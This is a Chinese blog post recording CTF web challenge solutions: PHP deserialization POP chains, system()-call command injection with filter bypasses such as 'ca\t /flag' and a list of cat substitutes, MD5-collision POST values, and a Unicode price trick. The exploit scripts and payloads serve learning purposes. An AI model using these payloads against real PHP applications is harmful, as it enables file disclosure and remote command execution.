1.29刷题记录

最新推荐文章于 2023-10-23 23:00:26 发布
最新推荐文章于 2023-10-23 23:00:26 发布
阅读量876 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51057892/article/details/113392288
版权

[MRCTF2020]Ezpop

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}
//文件包含漏洞,可以通过伪协议读取flag
//__invoke()   当脚本尝试将对象调用为函数时触发
//所以把Modifier类调用为函数

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}
//__toString   当一个对象被当作一个字符串被调用。
//__wakeup()   使用unserialize时触发

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}
//__get()    用于从不可访问的属性读取数据
//#难以访问包括:(1)私有属性,(2)没有初始化的属性

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}
?>

pop链

首先反序列化,调用wakeup方法,将this->source实例化为Show类,就调用tosring方法,如果将str实例化为Test,就能调用get方法,将get方法中的p赋值为Modifier类,就能调用invoke方法,最终调用文件包含函数,读取flag.php

<?php
class Modifier {
	protected  $var="php://filter/read=convert.base64-encode/resource=flag.php";

}

class Test{
    public $p;
	
}

class Show{
    public $source;
    public $str;
    public function __construct(){
        $this->str = new Test();
    }
}

$a = new Show();
$a->source = new Show();
$a->source->str->p = new Modifier();
echo urlencode(serialize($a));

运行结果:O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BN%3B%7D%7D


base64解码

在这里插入图片描述

序列化3

<?php
error_reporting(0);
highlight_file(__FILE__);
class Person{
    public $username='peguin';
    public $password='123456';
    public $file;
    public function __construct($username,$password)
    {
        $this->username = $username;
        $this->password = $password;
    }
    public function __destruct()
    {
        // TODO: Implement __destruct() method.
        echo "your file is ".$this->file;
    }

}
class Human{
    public $a;
    public function __construct($a){
        $this->a = $a;

    }
    public function __toString()
    {
        if(preg_match('/ls|cat|more|flag/i',$this->a)){
        // TODO: Implement __toString() method.
            
            die('姿势骚一点');
        }
        else{
            system($this->a);
        }
        return ("good");
    }
}


$a = $_GET['code'];
unserialize($a);
?>

通过system函数读取flag

当cat被过滤时
more:一页一页的显示档案内容 
less:与 more 类似 head:查看头几行 
tac:从最后一行开始显示,可以看出 tac 是cat 的反向显示 
tail:查看尾几行 nl:显示的时候,顺便输出行号 
od:以二进制的方式读取档案内容 
vi:一种编辑器,这个也可以查看 
vim:一种编辑器,这个也可以查看
sort:可以查看 
uniq:可以查看 
file -f:报错出具体内容 
grep 1、在当前目录中,查找后缀有 file 字样的文件中包含 test 字符串的文件,并打印出该字符串的行。此时,可以使用如下命令: grep test *file strings

<?php
class Person{
    public $username='peguin';
    public $password='123456';
    public $file;

}
class Human{
    public $a;
}
$n=new person();
$n->file=new human();
$n->file->a='sort /fla\g';//用sort查看
$c=serialize($n);
echo $c;
运行结果:O:6:"Person":3:{s:8:"username";s:6:"peguin";s:8:"password";s:6:"123456";s:4:"file";O:5:"Human":1:{s:1:"a";s:11:"sort /fla\g";}}

在这里插入图片描述

序列化4

<?php
highlight_file(__FILE__);
error_reporting(0);
class test{
    public $peguin;
    public $source;
    public function __construct($file){
        $this->source = $file;
        echo 'welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->peguin->close();
    }
    public function __wakeup(){
        if(preg_match('/http|file|data|dict|\.\./i',$this->source)){
            echo "hacker!";
            $this->source = "index.php";
        }
    }
}
class good{
    public $joker;
    public function __call($name,$param){
        system($this->joker);
    }
}
$a = $_GET['cmd'];
unserialize($a);
?>

_call函数:当调用的方法不存在时触发

<?php
class test{
    public $peguin;
    public $source;

}
class good{
    public $joker;
}


$a = new test();
$a->source=new test();
$a->source->peguin=new good();
$a->source->peguin->joker='ls';
echo serialize($a);
?>

先查看当前目录的文件
在这里插入图片描述

使用cat命令,页面无显示,这里用sort进行查看

$a->source->peguin->joker='sort flag.php';
运行结果:`O:4:"test":2:{s:6:"peguin";N;s:6:"source";O:4:"test":2:{s:6:"peguin";O:4:"good":1:{s:5:"joker";s:13:"sort flag.php";}s:6:"source";N;}}`

flag.php和flag.txt结果都一样

在这里插入图片描述

[安洵杯 2019]easy_web

网址中的img
在这里插入图片描述
经过了三重编码
hex->base64->base64
解码555.png
用index.php进行编码
得到TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
bp抓包
在这里插入图片描述

base64解码

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>

MD5强类型比较

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

接着是正则匹配,这里过滤了较多语句
可以用ca\t%20/flag进行绕过
在这里插入图片描述

[ASIS 2019]Unicorn shop

进去之后是一个购买页面
在这里插入图片描述
前三种商品无法购买
在这里插入图片描述
第四种商品购买时只允许出现一个字符
在这里插入图片描述
此题考点为unicode编码安全问题
https://www.compart.com/en/unicode/
输入thousand
在这里插入图片描述
代表的是五千
注意url编码
在这里插入图片描述
输入框中输入即可
在这里插入图片描述

conelly
关注
WgpSec(狼组安全) CTF PHPCode题目记录
e6678的博客
03-23 1556
PHPCode strcmp 题目描述 <?php include("flag.php"); highlight_file(__FILE__); if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。 //比较两个字符串(区分大小写) die('Flag:
文件包含、文件上传漏洞
CyhDl666的博客
01-28 1691
文章目录文件包含漏洞1.[HCTF 2018]WarmUp2.[ACTF2020 新生赛]Include3.[极客大挑战 2019]Secret File4.[BJDCTF2020]ZJCTF 不过如此 文件包含漏洞 不多说了 直接做题 1.[HCTF 2018]WarmUp F12进入source.php文件 <?php highlight_file(__FILE__); class emmm { public static function che
ctfshow php特性
m0_63253040的博客
08-01 350
有个正则匹配0-9数字,,输出flag的条件是要变量num为整数,直接用数组绕过就行了。
PHP代码审计12—反序列化漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-09 1634
PHP反序列化入门
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 6196
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
mnSQL2000-v1.29
最新发布
05-04
"mnSQL2000_v1.29" 在描述中重复出现,进一步确认了这是该软件的标识,可能表示这是一个名为mnSQL2000的程序,其版本号为1.29。 **标签解析** 标签"mnSQL2000_v1.29" 与标题和描述一致,它可能用于搜索引擎优化...
RTL9210B 最新固件 v1.29.38.042522
09-26
RTL9210B ngff / nvme 双协议 固态硬盘盒 最新固件 v1.29.38.042522
fastdfs-client-javajar1.29-SNAPSHOT.zip
05-29
标题中的"fastdfs-client-javajar1.29-SNAPSHOT.zip"指的是FastDFS客户端Java版的1.29-SNAPSHOT版本的压缩包文件。FastDFS是一个开源的、高性能的分布式文件系统,主要解决大容量存储和负载均衡的问题,尤其适合图片...
maxwell-1.29.2.tgz
10-24
这个"maxwell-1.29.2.tgz"文件正是Maxwell的一个版本包,版本号为1.29.2,其后缀名".tgz"表明这是一个经过tar打包并使用gzip压缩的文件,通常在Linux或Unix-like系统中使用。 Maxwell的核心原理是基于数据库的...
迷你SQL2000_v1.29.zip
01-03
迷你SQL2000_v1.29.zip是一款专为简单工作环境设计的轻量级SQL Server版本。作为一款绿色版数据库系统,它无需安装,用户可以直接运行,大大简化了部署流程,尤其适合那些需要快速启动数据库服务或者对系统资源有...
php反序列化之字符逃逸
qq_53856457的博客
05-14 1799
php反序列化之字符逃逸法 1.按我的理解,反序列化的过程就是碰到;}与最前面的{配对后,便停止反序列化。如下序列化: <?php class Test { public $a = "aa"; public $b = "bbb"; public $c = "cccc"; } $qwe = new Test(); echo serialize($qwe); 输出序列化结果为:O:4:“Test”:3:{s:1:“a”;s:2:“aa”;s:1:“b”;s:3:“bbb”;s:1:“c”;
[2023CISCN]国赛初赛WEB题目复现
qq_42585535的博客
10-23 648
最近几个月在学免杀,JAVA安全以及JS相关内容,导致CTF摆了很久,这次复现国赛题目就当做恢复训练了。
ctfshow web入门 序列化
Lumos427的博客
02-25 1557
序列化和反序列化 web254 <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this-&gt
ctfshow—PHP特性
cosmoslin的博客
09-14 2330
PHP特性 以ctfshow平台题目为例 web89 intval() 函数用于获取变量的整数值。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 web 90 int intval ( mixed $var [, int $base = 10 ] ) 如果 base 是 0,通过检测 var 的格式来决定使用的进制: 如果字符串包括了 “0x
POP链入门
cxiaodi的博客
06-11 207
【代码】POP链入门。
PHP 原生类学习与利用
snowlyzz的博客
09-22 1404
php 原生类利用与学习。
AreUSerialz-[网鼎杯 2020 青龙组]-[传送门->BUUCTF]
qwsn
11-23 1718
0x01、Web 1.AreUSerialz-[网鼎杯 2020 青龙组]-[传送门->BUUCTF] 第一步:打开题目环境,进行代码审计 <?php include("flag.php"); //文件包含flag.php highlight_file(__FILE__); //高亮显示当前页面源码 class FileHandler { //类:FileHandler protected $op; //保护属性:$op protected $
php反序列化漏洞入门知识
alert['Hello World']
01-25 794
目录 什么是php序列化? serialize()实例 数组序列化实例 对象序列化实例​ unserialize()实例 数组序列化实例 对象序列化实例 序列化字符串格式解析 变量类型 public、private、protected序列化后的区别 魔术方法 常见的魔术方法 方法调用实例 __sleep() __wakeup() __toString() 反序列化漏洞原理 参考链接
XCTF攻防世界warmup
daqiangdetianxia的博客
07-24 381
查看源代码,发现source.php 进去source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//可以发现有hint.php
1.29.391 9210b
09-06
1.29.391 9210b 是一个七位数。 从小数点开始看,第一位是1,表示该数是一个正数。第二位是2,表示这个数的百位是2。第三位是9,表示这个数的十位是9。第四位是3,表示这个数的个位是3。所以,这个数百位是2,十位...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值